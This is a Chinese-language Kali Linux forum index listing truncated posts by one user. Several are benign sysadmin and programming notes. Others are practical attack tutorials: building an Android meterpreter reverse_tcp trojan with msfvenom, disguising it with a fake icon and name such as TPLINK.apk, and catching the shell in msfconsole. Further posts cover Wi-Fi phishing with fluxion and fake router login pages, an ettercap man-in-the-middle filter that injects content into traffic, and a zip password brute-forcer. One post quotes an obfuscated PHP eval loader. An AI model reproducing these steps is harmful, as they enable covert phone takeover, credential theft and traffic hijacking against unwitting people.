跳转到帖子

Linux Kali高级学习教程

介绍Linux KALI的使用方法和各种系统工具的下载方法。

 

  1. 发帖人 Ken1Ve

    通常,我们利用ping命令来检测本地的网络是否流通,但是这样为常常给黑客提供了便利。那么liunx该如何关闭ping呢? 1、内核参数设置允许/禁止 ping 设置(默认允许 ping) 临时允许/禁止 ping 操作的命令为:修改 /proc/sys/net/ipv4/icmp_echo_ignore_all 文件的内容,该文件内容只有 1 个字符,0 为允许 ping,1 为禁止 ping,无需重启服务器; 永久允许/禁止 ping 配置方法: 修改文件 /etc/sysctl.conf,在文件末尾增加一行: net.ipv4.icmp_echo_ignore_all = 1如果已经有 net.ipv4.icmp_echo_ignore_all 这一行了,直接修改 = 号后面的值即可的 0 表示允许,1 表示禁止。 修改完成后执行 sysctl -p 使新配置生效(重要)。 2、防火墙设置(此处的方法的前提是内核配置是默认值,也就是没有禁止 ping) 这里以 iptables 防火墙为例,其他防火墙操作方法可参考防火墙的官方文档。 允许ping设置 iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT或者也可以临时停止防火墙: service iptables stop禁止ping设置 -A INPUT -p icmp --icmp-type 8…

    • 0 篇回复
    • 144 次查看
  2. 发帖人 Ken1Ve

    1:普通扫描nikto -h 目标 实例: nikto -h 192.168.3.1112:扫描指定端口nikto -h -h 192.168.0.1 -p 443 对443端口的扫描 nikto -h 192.168.3.111 -p 443 3:目录猜解-C 指定CGI目录 –all表示猜解CGI目录 nikto -h 192.168.3.111 -C all 4:漏洞扫描-T选项包含很多小选项 –T 9表示扫描SQL注入漏洞 -T选项包含的小选项解释: 0 检查文件上传页面 1 检查web日志 2 检查错误配置或默认文件 3检查信息泄露问题 4 检查XSS/Script/HTML问题 5 从根目录检查是否存在可访问的文件 6 检查拒绝服务问题 7 从任意文件检索是否存在可访问文件 8 检查是否存在系统命令执行漏洞 9 检查SQL注入漏洞 a 检查认证绕过问题 b 识别安装的软件版本 c 检查源代码泄露问题 x 反向链接选项 如:扫描sql注入漏洞 nikto -h 192.168.3.111 -T 9 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/190.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 152 次查看
  3. 发帖人 Ken1Ve

    一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非…

    • 0 篇回复
    • 150 次查看
  4. 发帖人 Ken1Ve

    一:准备现将做好的钓鱼页面放到site相对于的文件中 我这里有四个文件 360的 华为的 水星的 以及tplink的,对于的我已全部删掉。 二:运行fluxion 三:选择网卡 扫描周围的WiFi信号 四:选择数字前面代*号的 抓包 五:抓取数据包 六:选择钓鱼界面 本人的程序是自己修改的,所以会不一样。 开始攻击 连接效果 手机效果 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/193.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 200 次查看
  5. 发帖人 Ken1Ve

    在CentOS6上面安装phpmyadmin前,加入repo: rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt yum install http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpmyum -y install phpmyadmin但是发现资源里面根本没有phpmyadmin源。 所以我们可以通过安装REPO的一个软件: yum install epel-release 之后执行: yum -y install phpmyadmin即可。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/196.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 137 次查看
  6. 发帖人 Ken1Ve

    局部变量对于局部变量,只能在引用的函数中使用。而结束函数后,该变量也失去了意义。 全局变量顾名思义,全局变量就是在整个项目中都可以进行调用。但需要注意的是,在函数中是不能直接进行调用的,我们需要关键词globla进行声明就就可以了。 静态变量静态变量,其值是不会发生变化。通常用关键词static定义静态变量。 实例代码<?php /** 全局变量 、局部变量、静态变量。 **/ $c=6; $d=9; function bbs($a,$b){ echo "局部变量结果:" .$a*$b."</br>"; } ?> <?php function kali(){ global $c,$d; echo "全局变量结果:".$c*$d."</br>"; } ?> <?php function cn(){ static $f=1; echo "静态变量:".$f."</br>"; $f++; } ?> <?php bbs(7,7); kali(); cn(); cn(); ?> 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/195.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 146 次查看
  7. 发帖人 Ken1Ve

    一:首先根据各种途径获得对方的ip!此处省略一万字…… 二:开始通过ip定位打开网站:https://ip.rtbasia.com 输入IP地址,如图相对定位结果还是比较准确的。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/203.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 159 次查看
  8. 发帖人 Ken1Ve

    kali linux是默认安装java环境的,那么他该怎么样运行其他平台下的java软件呢?一:我们先在windows下编写一个小小的java程序。 附上源码: package kali; import java.awt.BorderLayout; import java.awt.EventQueue; import javax.swing.JFrame; import javax.swing.JOptionPane; import javax.swing.JPanel; import javax.swing.border.EmptyBorder; import javax.swing.JTextField; import javax.swing.JPasswordField; import javax.swing.JButton; import java.awt.event.ActionListener; import java.awt.event.ActionEvent; public class Kinux extends JFrame { private JPanel contentPane; private JTextField textField; private JPasswordField passwordField; /** * Launch the application. */ public …

    • 0 篇回复
    • 134 次查看
  9. 发帖人 Ken1Ve

    一:首先查看磁盘使用情况df linux中df命令详解 -a 显示所有文件系统的磁盘使用情况,包括0块(block)的文件系统,如/proc文件系统。 -k 以k字节为单位显示。 -i 显示i节点信息,而不是磁盘块。 -t 显示各指定类型的文件系统的磁盘空间使用情况。 -x 列出不是某一指定类型文件系统的磁盘空间使用情况(与t选项相反)。 -T 显示文件系统类型。 二:清理垃圾sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 sudo apt-get autoremove #删除系统不再使用的孤立软件 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/209.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 191 次查看
  10. 首先你的自己注册花生壳,这个不多聊了,不会的自己网上百度 我们重点说如何实现内网穿透,通过花生壳你会活得一个外网的域名 1、若服务器所接网络有分配真实动态公网IP地址,则进行配置就好了。用户可直接通过路由器设置端口映射,由花生壳域名绑定动态IP地址,实现外网通过域名访问局域网内搭建的服务。 2.内网穿透注:若服务器所接网络分配的为虚假的私网IP地址,或无法登录路由器设置端口映射,则可以通过花生壳的内网穿透功能实现外网访问,需进行开通穿透认证或购买付费服务详情戳我 点击客户端内网穿透,则跳转至花生壳管理的内网映射页面, 可直接在网页中对域名进行添加映射,即使不在服务器现场,也可以远程管理。 下面介绍内网映射添加步骤: ①点击【内网穿透】——【添加映射】 ②添加成功后,会生成一个外网访问地址。 http://upload.orayer.com/upload/help/1703/20170331195243536.png 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/218.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 158 次查看
  11. 发帖人 Ken1Ve

    题记一次在开发PHP时,需要参考一段代码。然后从伟大的度娘哪里百度了一段。可以实现我们想要的功能,但是当我在修改代码的过程中,遇到了下面情况。<?php // Copyright(C) 2008-2012 www.axphp.com, All rights reserved. $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=1300;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMC…

    • 0 篇回复
    • 130 次查看
  12. 发帖人 Ken1Ve

    在这篇文章中,我们将向您展示如何重置MySQL root密码以备忘记。 以下步骤适用于任何现代Linux发行版。 首先停止MySQL或MariaDB服务 sudo systemctl stop mysql无需密码即可启动MySQL服务器 mysqld_safe --skip-grant-tables &登录到MySQL shell mysql -u root如何重置MySQL root密码 设置一个新的MySQL root密码 根据您在系统上运行的MySQL或MariaDB服务器版本,您需要使用不同的命令来恢复root密码。 您可以通过发出以下命令找到您的服务器版本: mysql --version mysql Ver 8.0.11 for Linux on x86_64( MySQL Community Server - GPL )如何重置MySQL root密码从上面的输出中可以看到,我运行的是MySQL 8.0.11版本。 如果您有MySQL 5.7.6及更高版本或MariaDB 10.1.20及更高版本,请运行以下命令: ALTER USER 'root'@'localhost' IDENTIFIED BY 'MY_NEW_PASSWORD'; FLUSH PRIVILEGES;如果您有MySQL 5.7.5及更早版本或MariaDB 10.1.20及更早版本,请运行以下命令: SET PASSWORD FOR 'root'@'localhost' = PASSWORD('MY_NEW_PASSWORD'); FL…

    • 0 篇回复
    • 149 次查看
  13. 发帖人 Ken1Ve

    一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 二:启动Apacheservce apache2 start 三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件 四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef 五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2 然后我们载入刚才生成的脚本 然后开始中间人攻击 版权属于:逍遥…

    • 0 篇回复
    • 195 次查看
  14. 软件使用截图 参数配置 结果 下载Bruter_1.1.zip 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/227.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 132 次查看
  15. 发帖人 Ken1Ve

    一:下载64位地址:https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址:https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二:安装下载后,将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三:运行终端命令 Stacer CPU监控 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/225.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 145 次查看
  16. 发帖人 Ken1Ve

    一:简介wafw00f 是python脚本,用于检测网络服务器是否处于网络应用的防火墙(WAF,web application firewall)保护状态 二:使用wafw00f www.baidu.com 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/228.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 132 次查看
  17. 发帖人 Ken1Ve

    jsoup 是一款Java 的HTML解析器,可直接解析某个URL地址、HTML文本内容。它提供了一套非常省力的API,可通过DOM,CSS以及类似于jQuery的操作方法来取出和操作数据。import org.jsoup.Jsoup; import org.jsoup.nodes.Document; import org.jsoup.nodes.Element; import org.jsoup.select.Elements; public class Lcy { public static void main(String[] args) { String html = "<a href=\"http://bbskali.cn">kali论坛</a>"; Document doc = Jsoup.parse(html); Elements link = doc.getElementsByTag("a"); Element a = link.get(0); System.out.println(a.attr("href")); } } 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/235.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 187 次查看
  18. 发帖人 Ken1Ve

    文件源码import zipfile import optparse from threading import Thread def extractFile(zFile,password): try: zFile.extractall(pwd=password) print '[+] Password = ' + password + '\n' except: pass def main(): parser = optparse.OptionParser("usage%prog " + "-f <zipfile> -d <dictionary>") parser.add_option('-f', dest='zname', type='string', help='specify zip file') parser.add_option('-d', dest='dname', type='string', help='specify zip file') (options, args) = parser.parse_args() if(options.zname == None) | (options.dname == None): print parser.usage exit(0) else: zname = options.zname …

    • 0 篇回复
    • 164 次查看
  19. 发帖人 Ken1Ve

    一:生成木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > TPLINK.apk二:监听木马msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.108 set LPORT 5555 exploit三:视频演示 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/249.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

    • 0 篇回复
    • 167 次查看
  20. 发帖人 Ken1Ve

    一:坦克大战源码 import java.util.ArrayList; import java.awt.*; import java.awt.event.*; import java.util.List; import javax.swing.JOptionPane; public class TankClient extends Frame implements ActionListener { /** * */ private static final long serialVersionUID = 1L; public static final int Fram_width = 800; // public static final int Fram_length = 600; public static boolean printable = true; MenuBar jmb = null; Menu jm1 = null, jm2 = null, jm3 = null, jm4 = null; MenuItem jmi1 = null, jmi2 = null, jmi3 = null, jmi4 = null, jmi5 = null, jmi6 = null, jmi7 = null, jmi8 = null, jmi9 = null; Image screenImage = null; …

    • 0 篇回复
    • 153 次查看

Who was online for 24 hours 4